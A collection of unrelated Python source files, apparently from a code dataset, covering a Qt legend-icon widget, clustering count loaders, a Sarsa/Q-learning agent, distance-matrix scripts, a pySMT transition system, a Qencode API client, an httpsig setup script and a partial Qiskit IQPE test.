if numpy.array_equal(self.colormap, colormap):
# This also works with strings
return
self.colormap = colormap
self.update()
def getColormap(self):
"""Returns the used colormap.
        If the argument was set with a `Colormap` object, this function
        returns the LUT, represented by a string name or by an array of colors.
:returns: Union[None,str,numpy.ndarray,Colormap]
"""
return self.colormap
def setSymbolColormap(self, colormap):
"""Set the colormap to display a symbol
If the argument is a `Colormap` object, only the current state will be
displayed. The object itself will not be stored, and further changes
of this `Colormap` will not update this widget.
:param Union[str,numpy.ndarray,Colormap] colormap: The colormap to
display
"""
colormap = self._toLut(colormap)
if colormap is None:
            if self.symbolColormap is None:
return
self.symbolColormap = None
self.update()
return
if numpy.array_equal(self.symbolColormap, colormap):
# This also works with strings
return
self.symbolColormap = colormap
self.update()
def getSymbolColormap(self):
"""Returns the used symbol colormap.
        If the argument was set with a `Colormap` object, this function
        returns the LUT, represented by a string name or by an array of colors.
        :returns: Union[None,str,numpy.ndarray,Colormap]
        """
        return self.symbolColormap
# Paint
def paintEvent(self, event):
"""
:param event: event
:type event: QPaintEvent
"""
painter = qt.QPainter(self)
self.paint(painter, event.rect(), self.palette())
def paint(self, painter, rect, palette):
painter.save()
painter.setRenderHint(qt.QPainter.Antialiasing)
# Scale painter to the icon height
# current -> width = 2.5, height = 1.0
scale = float(self.height())
ratio = float(self.width()) / scale
symbolOffset = qt.QPointF(.5 * (ratio - 1.), 0.)
# Determine and scale offset
offset = qt.QPointF(float(rect.left()) / scale, float(rect.top()) / scale)
# Override color when disabled
if self.isEnabled():
overrideColor = None
else:
overrideColor = palette.color(qt.QPalette.Disabled,
qt.QPalette.WindowText)
# Draw BG rectangle (for debugging)
# bottomRight = qt.QPointF(
# float(rect.right())/scale,
# float(rect.bottom())/scale)
# painter.fillRect(qt.QRectF(offset, bottomRight),
# qt.QBrush(qt.Qt.green))
if self.showColormap:
if self.colormap is not None:
if self.isEnabled():
image = self.getColormapImage(self.colormap)
else:
image = self.getGrayedColormapImage(self.colormap)
pixmapRect = qt.QRect(0, 0, _COLORMAP_PIXMAP_SIZE, 1)
widthMargin = 0
halfHeight = 4
dest = qt.QRect(
rect.left() + widthMargin,
rect.center().y() - halfHeight + 1,
rect.width() - widthMargin * 2,
halfHeight * 2,
)
painter.drawImage(dest, image, pixmapRect)
painter.scale(scale, scale)
llist = []
if self.showLine:
linePath = qt.QPainterPath()
linePath.moveTo(0., 0.5)
linePath.lineTo(ratio, 0.5)
# linePath.lineTo(2.5, 0.5)
lineBrush = qt.QBrush(
self.lineColor if overrideColor is None else overrideColor)
linePen = qt.QPen(
lineBrush,
(self.lineWidth / self.height()),
self.lineStyle,
qt.Qt.FlatCap
)
llist.append((linePath, linePen, lineBrush))
isValidSymbol = (len(self.symbol) and
self.symbol not in _NoSymbols)
if self.showSymbol and isValidSymbol:
if self.symbolColormap is None:
# PITFALL ahead: Let this be a warning to others
# symbolPath = Symbols[self.symbol]
# Copy before translate! Dict is a mutable type
symbolPath = qt.QPainterPath(_Symbols[self.symbol])
symbolPath.translate(symbolOffset)
symbolBrush = qt.QBrush(
self.symbolColor if overrideColor is None else overrideColor,
self.symbolStyle)
symbolPen = qt.QPen(
self.symbolOutlineBrush, # Brush
1. / self.height(), # Width
qt.Qt.SolidLine # Style
)
llist.append((symbolPath,
symbolPen,
symbolBrush))
else:
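                # No single symbol color: draw several symbols across the icon
                # width, each filled with a color sampled from the symbol colormap.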
nbSymbols = int(ratio + 2)
for i in range(nbSymbols):
if self.isEnabled():
image = self.getColormapImage(self.symbolColormap)
else:
image = self.getGrayedColormapImage(self.symbolColormap)
pos = int((_COLORMAP_PIXMAP_SIZE / nbSymbols) * i)
pos = numpy.clip(pos, 0, _COLORMAP_PIXMAP_SIZE-1)
color = image.pixelColor(pos, 0)
delta = qt.QPointF(ratio * ((i - (nbSymbols-1)/2) / nbSymbols), 0)
symbolPath = qt.QPainterPath(_Symbols[self.symbol])
symbolPath.translate(symbolOffset + delta)
symbolBrush = qt.QBrush(color, self.symbolStyle)
symbolPen = qt.QPen(
self.symbolOutlineBrush, # Brush
1. / self.height(), # Width
qt.Qt.SolidLine # Style
)
llist.append((symbolPath,
symbolPen,
symbolBrush))
# Draw
for path, pen, brush in llist:
path.translate(offset)
painter.setPen(pen)
painter.setBrush(brush)
painter.drawPath(path)
painter.restore()
# Helpers
@staticmethod
def isEmptySymbol(symbol):
"""Returns True if this symbol description will result in an empty
symbol."""
return symbol in _NoSymbols
@staticmethod
def isEmptyLineStyle(lineStyle):
"""Returns True if this line style description will result in an empty
line."""
return lineStyle in _NoLineStyle
@staticmethod
def _getColormapKey(colormap):
"""
Returns the key used to store the image in the data storage
"""
if isinstance(colormap, numpy.ndarray):
key = tuple(colormap)
else:
key = colormap
return key
@staticmethod
def getGrayedColormapImage(colormap):
"""Return a grayed version image preview from a LUT name.
        These images are cached in a global structure.
:param Union[str,numpy.ndarray] colormap: Description of the LUT
:rtype: qt.QImage
"""
key = LegendIconWidget._getColormapKey(colormap)
grayKey = (key, "gray")
image = _colormapImage.get(grayKey, None)
if image is None:
image = LegendIconWidget.getColormapImage(colormap)
image = image.convertToFormat(qt.QImage.Format_Grayscale8)
_colormapImage[grayKey] = image
return image
@staticmethod
def getColormapImage(colormap):
"""Return an image preview from a LUT name.
        These images are cached in a global structure.
:param Union[str,numpy.ndarray] colormap: Description of the LUT
:rtype: qt.QImage
"""
key = LegendIconWidget._getColormapKey(colormap)
image = _colormapImage.get(key, None)
if image is None:
image = LegendIconWidget.createColormapImage(colormap)
_colormapImage[key] = image
return image
@staticmethod
    def createColormapImage(colormap):
        """Create and return an image preview from a LUT name.
        The result is cached in a global structure by :meth:`getColormapImage`.
:param Union[str,numpy.ndarray] colormap: Description of the LUT
:rtype: qt.QImage
"""
size = _COLORMAP_PIXMAP_SIZE
if isinstance(colormap, numpy.ndarray):
lut = colormap
if len(lut) > size:
# Down sample
step = int(len(lut) / size)
lut = lut[::step]
elif len(lut) < size:
# Over sample
indexes = numpy.arange(size) / float(size) * (len(lut) - 1)
indexes = indexes.astype("int")
lut = lut[indexes]
else:
colormap = colors.Colormap(colormap)
lut = colormap.getNColors(size)
if lut is None or len(lut) == 0:
            return qt.QImage()
pixmap = qt.QPixmap(size, 1)
painter = qt.QPainter(pixmap)
for i in range(size):
rgb = lut[i]
r, g, b = rgb[0], rgb[1], rgb[2]
painter.setPen(qt.QColor(r, g, b))
painter.drawPoint(qt.QPoint(i, 0))
painter.end()
return pixmap.toImage()
|
the-stack_0_6555 | import sys
import os
import scipy.sparse
import numpy as np
from util import argsort_bigtosmall_stable
def loadKeffForTask(
taskpath,
effCountThr=0.01,
MIN_PRESENT_COUNT=1e-10,
**kwargs):
''' Load effective number of clusters used at each checkpoint.
Returns
-------
Keff : 1D array, size nCheckpoint
'''
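    # Keff at a checkpoint = number of clusters whose count is >= effCountThr.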
effCountThr = np.maximum(effCountThr, MIN_PRESENT_COUNT)
CountMat, Info = loadCountHistoriesForTask(taskpath,
MIN_PRESENT_COUNT=MIN_PRESENT_COUNT)
return np.sum(CountMat >= effCountThr, axis=1)
def loadCountHistoriesForTask(
taskpath,
sortBy=None,
MIN_PRESENT_COUNT=1e-10):
''' Load sparse matrix of counts for all clusters used throughout task.
Returns
-------
AllCountMat : 2D array, nCheckpoint x nTotal
Info : dict
'''
idpath = os.path.join(taskpath, 'ActiveIDs.txt')
ctpath = os.path.join(taskpath, 'ActiveCounts.txt')
fid = open(idpath, 'r')
fct = open(ctpath, 'r')
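    # ActiveIDs.txt and ActiveCounts.txt are parallel files: line i lists the
    # UIDs / counts of the clusters active at checkpoint i.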
data = list()
colids = list()
rowids = list()
for ii, idline in enumerate(fid.readlines()):
idstr = str(idline.strip())
ctstr = str(fct.readline().strip())
idvec = np.asarray(idstr.split(' '), dtype=np.int32)
ctvec = np.asarray(ctstr.split(' '), dtype=np.float)
data.extend(ctvec)
colids.extend(idvec)
rowids.extend( ii * np.ones(idvec.size))
# Identify columns by unique ids
allUIDs = np.unique(colids)
compactColIDs = -1 * np.ones_like(colids)
for pos, u in enumerate(allUIDs):
mask = colids == u
compactColIDs[mask] = pos
assert compactColIDs.min() >= 0
# CountMat : sparse matrix of active counts at each checkpoint
# Each row gives count (or zero if eliminated) at single lap
data = np.asarray(data)
np.maximum(data, MIN_PRESENT_COUNT, out=data)
ij = np.vstack([rowids, compactColIDs])
CountMat = scipy.sparse.csr_matrix((data, ij))
CountMat = CountMat.toarray()
assert allUIDs.size == CountMat.shape[1]
# Split all columns into two sets: active and eliminated
nCol = CountMat.shape[1]
elimCols = np.flatnonzero(CountMat[-1, :] < MIN_PRESENT_COUNT)
activeCols = np.setdiff1d(np.arange(nCol), elimCols)
nElimCol = len(elimCols)
nActiveCol = len(activeCols)
ElimCountMat = CountMat[:, elimCols]
ActiveCountMat = CountMat[:, activeCols]
elimUIDs = allUIDs[elimCols]
activeUIDs = allUIDs[activeCols]
# Fill out info dict
Info = dict(
CountMat=CountMat,
allUIDs=allUIDs,
ActiveCountMat=ActiveCountMat,
ElimCountMat=ElimCountMat,
activeCols=activeCols,
elimCols=elimCols,
activeUIDs=activeUIDs,
elimUIDs=elimUIDs)
if not isinstance(sortBy, str) or sortBy.lower().count('none'):
return CountMat, Info
if sortBy.lower().count('finalorder'):
rankedActiveUIDs = idvec
raise ValueError("TODO")
elif sortBy.lower().count('countvalues'):
## Sort columns from biggest to smallest (at last chkpt)
rankedActiveIDs = argsort_bigtosmall_stable(ActiveCountMat[-1,:])
else:
raise ValueError("TODO")
# Sort active set by size at last snapshot
ActiveCountMat = ActiveCountMat[:, rankedActiveIDs]
activeUIDs = activeUIDs[rankedActiveIDs]
activeCols = activeCols[rankedActiveIDs]
# Sort eliminated set by historical size
rankedElimIDs = argsort_bigtosmall_stable(ElimCountMat.sum(axis=0))
ElimCountMat = ElimCountMat[:, rankedElimIDs]
elimUIDs = elimUIDs[rankedElimIDs]
elimCols = elimCols[rankedElimIDs]
Info['activeUIDs'] = activeUIDs
Info['activeCols'] = activeCols
Info['elimUIDs'] = elimUIDs
Info['elimCols'] = elimCols
return ActiveCountMat, ElimCountMat, Info
def LoadActiveIDsForTaskFromLap(taskpath, queryLap='final'):
''' Load vector of active cluster UIDs for specific lap
Essentially reads a single line of the ActiveIDs.txt file from taskpath
Returns
-------
idvec : 1D array, size K
where K is number of clusters active at chosen lap
'''
lappath = os.path.join(taskpath, 'laps.txt')
laps = np.loadtxt(lappath)
if queryLap is not None and queryLap != 'final':
if queryLap not in laps:
raise ValueError('Target lap not found.')
idpath = os.path.join(taskpath, 'ActiveIDs.txt')
with open(idpath, 'r') as f:
for ii, curLap in enumerate(laps):
idstr = f.readline().strip()
if curLap == queryLap or (curLap == laps[-1] and queryLap == 'final'):
idvec = np.asarray(idstr.split(' '), dtype=np.int32)
return idvec
if __name__ == '__main__':
tpath = "/data/liv/xdump/BerkPatchB1/billings-alg=bnpyHDPbirthmerge-lik=ZeroMeanGauss-ECovMat=diagcovdata-sF=0.1-K=1-initname=bregmankmeans-nBatch=1/1/"
loadCountHistoriesForTask(tpath)
|
the-stack_0_6558 | import numpy as np
class Agent():
"""Three solving agents-
1. Sarsa(0)
2. Expected Sarsa
3. Q-Learning
policy used: epsilon greedy
Plus a run loop for windy gridworld
"""
def __init__(self, numStates, numActions, discount=1, lr = 0.5, update="sarsa0",
epsilon = 0.1):
self.update_Q = self.getAgent(update)
self.S, self.A = numStates, numActions
self.gamma = discount
self.epsilon = epsilon
self.lr = lr
self.Q = np.zeros((numStates,numActions))
def getAgent(self, update):
if update=="sarsa0":
return self.sarsa0
elif update=="expected-sarsa":
return self.sarsaE
elif update=="Q":
return self.Q_Learning
def epsilonGreedy(self,s):
if(np.random.uniform()>self.epsilon):
return np.argmax(self.Q[s])
else:
return np.random.choice(self.A)
def sarsa0(self, s, a, r, s1, a1):
self.Q[s,a] += self.lr*(r + self.gamma*self.Q[s1,a1]-self.Q[s,a])
def sarsaE(self, s, a, r, s1, a1):
#find expected Q
bestQ = np.max(self.Q[s1])
expected_sample = np.sum(self.Q[s1])*self.epsilon/self.A
expected = bestQ*(1-self.epsilon)+expected_sample
#find target
target = r + self.gamma*expected
#update Q
self.Q[s,a] += self.lr*(target-self.Q[s,a])
def Q_Learning(self, s, a, r, s1, a1):
        self.Q[s,a] += self.lr*(r + self.gamma*np.max(self.Q[s1]) - self.Q[s,a])  # max over all actions in s1
# def run(self, env, steps = 8000, episodes=100,
# verbose=False):
# data = []
# for e in range(episodes):
# env.start()
# x, y = env.state()
# state = int(x+10*y)
# a = self.epsilonGreedy(state)
# for step in range(steps):
# x, y, r = env.step(a).values()
# new_state = x+10*y
# a1 = self.epsilonGreedy(new_state)
# self.update_Q(state, a, r, new_state, a1)
# state = new_state
# a = a1
# if(env.end()):
# break
# data.append(step)
# print(step)
# return data
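# A minimal, self-contained smoke test of the update rules above. The toy
# two-state / two-action MDP here is an illustrative assumption, not the
# windy gridworld the class docstring refers to.
if __name__ == "__main__":
    agent = Agent(numStates=2, numActions=2, update="Q", discount=0.9)
    for _ in range(1000):
        s = np.random.choice(2)
        a = agent.epsilonGreedy(s)
        r = 1.0 if (s == 1 and a == 1) else 0.0  # reward only for action 1 in state 1
        s1 = np.random.choice(2)
        a1 = agent.epsilonGreedy(s1)
        agent.update_Q(s, a, r, s1, a1)
    print(agent.Q)  # the entry for (state 1, action 1) should dominate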
|
the-stack_0_6559 | def main():
print('I will set up a pairwise-compete matrix')
compare_pairwise_complete()
# # test that distances calculated using custom and pdist functions are the same
# # - they are
# data_type = 'ptm_none'
# dist_metric = 'euclidean'
# compare_pdist_to_custom_dist_mat(data_type=data_type, dist_metric=dist_metric)
def compare_pairwise_complete(data_type='ptm_none',
dist_metric='euclidean', swap_nan=True):
'''
compare distance matrix based on pairwise complete calculation and normal
interpolate with zeros calculation
'''
filename = '../lung_cellline_3_1_16/lung_cl_all_ptm/precalc_processed/' + \
data_type + '.txt'
# interpolate missing values with zeros
dist_norm = calc_custom_dist(filename, data_type, dist_metric,
swap_nan=True)
# run pairwise complete comparisons
dist_pairwise = calc_custom_dist(filename, data_type, dist_metric,
swap_nan=False)
difference = dist_norm - dist_pairwise
print('\nthere is a difference between normal and pairwise complete')
print('--------------------------------------------------------------------')
print(dist_norm[:5])
print(dist_pairwise[:5])
print(sum(difference))
def compare_pdist_to_custom_dist_mat(data_type='ptm_none',
dist_metric='euclidean', swap_nan=True):
'''
calculate cell line distance based on data_type (e.g. expression) with
optional filtering and normalization
'''
filename = '../lung_cellline_3_1_16/lung_cl_all_ptm/precalc_processed/' + \
data_type + '.txt'
dist_pdist = calc_pdist_dist(filename, data_type, dist_metric)
dist_custom = calc_custom_dist(filename, data_type, dist_metric,
swap_nan=swap_nan)
difference = dist_pdist - dist_custom
print('\nno difference between custom calculation and pdist calculation')
print('--------------------------------------------------------------------')
print(dist_pdist[:5])
print(dist_custom[:5])
print(sum(difference))
def calc_custom_dist(filename, data_type, dist_metric, swap_nan=True):
import numpy as np
import pandas as pd
import scipy.spatial.distance as dist_fun
from scipy.spatial.distance import pdist
df = get_df(filename, swap_nan)
rows = df.index.tolist()
cols = df.columns.tolist()
    # one slot per unordered pair of columns (previously hard-coded to 666, i.e. 37 columns)
    dist_vector = np.zeros(len(cols) * (len(cols) - 1) // 2)
# write for-loop to calculate custom distance matrix and compare result
# to pdist
num_calc = 0
for i in range(len(cols)):
col_1 = cols[i]
for j in range(len(cols)):
if j > i:
col_2 = cols[j]
vect_1 = df[col_1]
vect_2 = df[col_2]
mat = np.vstack((vect_1, vect_2)).transpose()
df_small = pd.DataFrame(mat)
# always dropna (nans will be optionally swapped out elsewhere)
df_small = df_small.dropna(axis=0)
# calc distance using pdist (only two vectors)
df_small = df_small.transpose()
dist_pdist = pdist(df_small, metric=dist_metric)
# # calculating distances of two vectors (using pdist instead)
# if dist_metric == 'euclidean':
# inst_dist = dist_fun.euclidean(vect_1, vect_2)
# elif dist_metric == 'cosine':
# inst_dist = dist_fun.cosine(vect_1, vect_2)
# save to distance vector
dist_vector[num_calc] = dist_pdist
num_calc = num_calc + 1
return dist_vector
def calc_pdist_dist(filename, data_type, dist_metric):
from scipy.spatial.distance import pdist, squareform
df = get_df(filename, swap_nan=True)
# transpose to calc distance matrix of columns
df = df.transpose()
dist_pdist = pdist(df, metric=dist_metric)
return dist_pdist
def get_df(filename, swap_nan=True):
from copy import deepcopy
from clustergrammer import Network
net = deepcopy(Network())
# load file and export dataframe
net.load_file(filename)
if swap_nan == True:
net.swap_nan_for_zero()
tmp_df = net.dat_to_df()
df = tmp_df['mat']
return df
main() |
the-stack_0_6560 | from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
symbols = frozenset([pc, x, y, z])
n_locs = 5
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
# initial location.
init = pcs[0]
# control flow graph.
cfg = mgr.And(
# pc = -1 : -1,
mgr.Implies(pcend, x_pcend),
# pc = 0 & !(y >= 1) : -1,
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
# pc = 0 & y >= 1 : 1,
mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
# pc = 1 & !(z >= 1) : -1,
mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
# pc = 1 & z >= 1 : 2,
mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
# pc = 2 & !(x >= 0) : -1,
mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
# pc = 2 & x >= 0 : 3,
mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
# pc = 3 : 4,
mgr.Implies(pcs[3], x_pcs[4]),
# pc = 4 : 2,
mgr.Implies(pcs[4], x_pcs[2]))
# transition labels.
labels = mgr.And(
# (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
# (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z),
mgr.Implies(
mgr.And(pcs[4], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
mgr.Equals(x_z, z))))
# transition relation.
trans = mgr.And(cfg, labels)
# fairness.
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
symbs = frozenset([pc, x, y, z])
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
res = []
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_3 = mgr.Int(3)
stutter = mgr.Equals(x_y, y)
loc0 = Location(env, mgr.GE(y, i_0))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, i_1)))
loc1 = Location(env, mgr.GE(y, i_1))
loc1.set_progress(2, mgr.Equals(x_y, mgr.Plus(y, i_1)))
loc2 = Location(env, mgr.GE(y, i_2))
loc2.set_progress(0, mgr.Equals(x_y, y))
h_y = Hint("h_y1", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1, loc2])
res.append(h_y)
stutter = mgr.Equals(x_x, x)
loc = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)),
stutterT=stutter)
loc.set_progress(0, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_2)))
h_x = Hint("h_x1", env, frozenset([x]), symbs)
h_x.set_locs([loc])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_3))
loc0.set_progress(0, mgr.GT(x_z, z))
h_z = Hint("h_z1", env, frozenset([z]), symbs)
h_z.set_locs([loc0])
res.append(h_z)
stutter = mgr.Equals(x_x, x)
loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1)))
h_x = Hint("h_x2", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(y, i_3))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, i_1)))
loc1 = Location(env, mgr.GE(y, i_3), mgr.GE(x, i_2))
loc1.set_progress(0, mgr.Equals(x_y, mgr.Plus(y, x)))
h_y = Hint("h_y3", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(y, i_3))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, i_1)))
loc1 = Location(env, mgr.GE(y, i_3))
loc1.set_progress(2, mgr.Equals(x_y, y))
loc2 = Location(env, mgr.GE(y, i_3))
loc2.set_progress(2, mgr.Equals(x_y, mgr.Plus(y, i_1)))
h_y = Hint("h_y4", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1, loc2])
res.append(h_y)
return frozenset(res)
|
the-stack_0_6561 | from . httptools import Http
from . task import Task
class Client(object):
"""
:return: encoder object
"""
def __init__(self, api_key, api_url=None, version=None):
self.api_key = api_key
self.api_url = api_url if api_url else 'https://api.qencode.com/'
self.version = version if version else 'v1'
self.connect = Http(self.version, self.api_url)
self.access_token = None
self.expire = None
self.error = None
self.code = None
self.message = ''
self._get_access_token()
def create_task(self, **kwargs):
return Task(self.access_token, self.connect, **kwargs)
def refresh_access_token(self, **kwargs):
response = self.connect.request('access_token', dict(api_key=self.api_key))
if not response['error']:
self.access_token = response['token']
self.expire = response['expire']
else:
self.error = response['error']
self.code = response['error']
self.message = response.get('message')
def _get_access_token(self):
response = self.connect.request('access_token', dict(api_key=self.api_key))
if not response['error']:
self.access_token = response['token']
self.expire = response['expire']
else:
self.error = response['error']
self.code = response['error']
self.message = response.get('message')
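# Illustrative usage (the API key string below is a placeholder assumption,
# not a real credential):
#
#     client = Client('my-qencode-api-key')
#     if client.error:
#         raise RuntimeError(client.message)
#     task = client.create_task()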
|
the-stack_0_6562 | #!/usr/bin/env python
from setuptools import setup, find_packages
# versioneer config
import versioneer
versioneer.versionfile_source = 'httpsig/_version.py'
versioneer.versionfile_build = 'httpsig/_version.py'
versioneer.tag_prefix = 'v' # tags are like v1.2.0
versioneer.parentdir_prefix = 'httpsig-' # dirname like 'myproject-1.2.0'
# create long description
with open('README.rst') as file:
long_description = file.read()
with open('CHANGELOG.rst') as file:
long_description += '\n\n' + file.read()
setup(
name='httpsig',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="Secure HTTP request signing using the HTTP Signature draft specification",
long_description=long_description,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='http,authorization,api,web',
author='Adam Knight',
author_email='[email protected]',
url='https://github.com/ahknight/httpsig',
license='MIT',
packages=find_packages(),
include_package_data=True,
zip_safe=True,
install_requires=['pycrypto', 'cryptography>=1.7.1','six'],
test_suite="httpsig.tests",
)
|
the-stack_0_6565 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
import unittest
import numpy as np
from parameterized import parameterized
from scipy.linalg import expm
from scipy import sparse
from qiskit.transpiler import PassManager
from test.aqua.common import QiskitAquaTestCase
from qiskit import BasicAer
from qiskit.aqua import QuantumInstance
from qiskit.aqua.utils import decimal_to_binary
from qiskit.aqua.algorithms import IQPE
from qiskit.aqua.algorithms import ExactEigensolver
from qiskit.aqua.operators import WeightedPauliOperator, MatrixOperator, op_converter
from qiskit.aqua.components.initial_states import Custom
X = np.array([[0, 1], [1, 0]])
Y = np.array([[0, -1j], [1j, 0]])
Z = np.array([[1, 0], [0, -1]])
_I = np.array([[1, 0], [0, 1]])
h1 = X + Y + Z + _I
qubit_op_simple = MatrixOperator(matrix=h1)
qubit_op_simple = op_converter.to_weighted_pauli_operator(qubit_op_simple)
pauli_dict = {
'paulis': [
{"coeff": {"imag": 0.0, "real": -1.052373245772859}, "label": "II"},
{"coeff": {"imag": 0.0, "real": 0.39793742484318045}, "label": "IZ"},
{"coeff": {"imag": 0.0, "real": -0.39793742484318045}, "label": "ZI"},
{"coeff": {"imag": 0.0, "real": -0.01128010425623538}, "label": "ZZ"},
{"coeff": {"imag": 0.0, "real": 0.18093119978423156}, "label": "XX"}
]
}
qubit_op_h2_with_2_qubit_reduction = WeightedPauliOperator.from_dict(pauli_dict)
pauli_dict_zz = {
'paulis': [
{"coeff": {"imag": 0.0, "real": 1.0}, "label": "ZZ"}
]
}
qubit_op_zz = WeightedPauliOperator.from_dict(pauli_dict_zz)
class TestIQPE(QiskitAquaTestCase):
"""IQPE tests."""
@parameterized.expand([
[qubit_op_simple, 'qasm_simulator', 1, 5],
[qubit_op_zz, 'statevector_simulator', 1, 1],
[qubit_op_h2_with_2_qubit_reduction, 'statevector_simulator', 1, 6],
])
def test_iqpe(self, qubit_op, simulator, num_time_slices, num_iterations):
self.algorithm = 'IQPE'
self.log.debug('Testing IQPE')
self.qubit_op = qubit_op
exact_eigensolver = ExactEigensolver(self.qubit_op, k=1)
results = exact_eigensolver.run()
self.ref_eigenval = results['eigvals'][0]
self.ref_eigenvec = results['eigvecs'][0]
self.log.debug('The exact eigenvalue is: {}'.format(self.ref_eigenval))
self.log.debug('The corresponding eigenvector: {}'.format(self.ref_eigenvec))
state_in = Custom(self.qubit_op.num_qubits, state_vector=self.ref_eigenvec)
iqpe = IQPE(self.qubit_op, state_in, num_time_slices, num_iterations,
expansion_mode='suzuki', expansion_order=2, shallow_circuit_concat=True)
backend = BasicAer.get_backend(simulator)
